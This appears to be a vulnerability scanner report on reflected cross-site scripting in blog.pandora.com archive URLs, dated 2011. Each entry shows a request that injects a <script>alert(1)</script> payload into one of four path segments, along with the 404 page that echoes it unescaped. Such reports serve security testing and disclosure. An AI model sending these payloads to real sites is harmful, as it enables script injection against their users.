The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
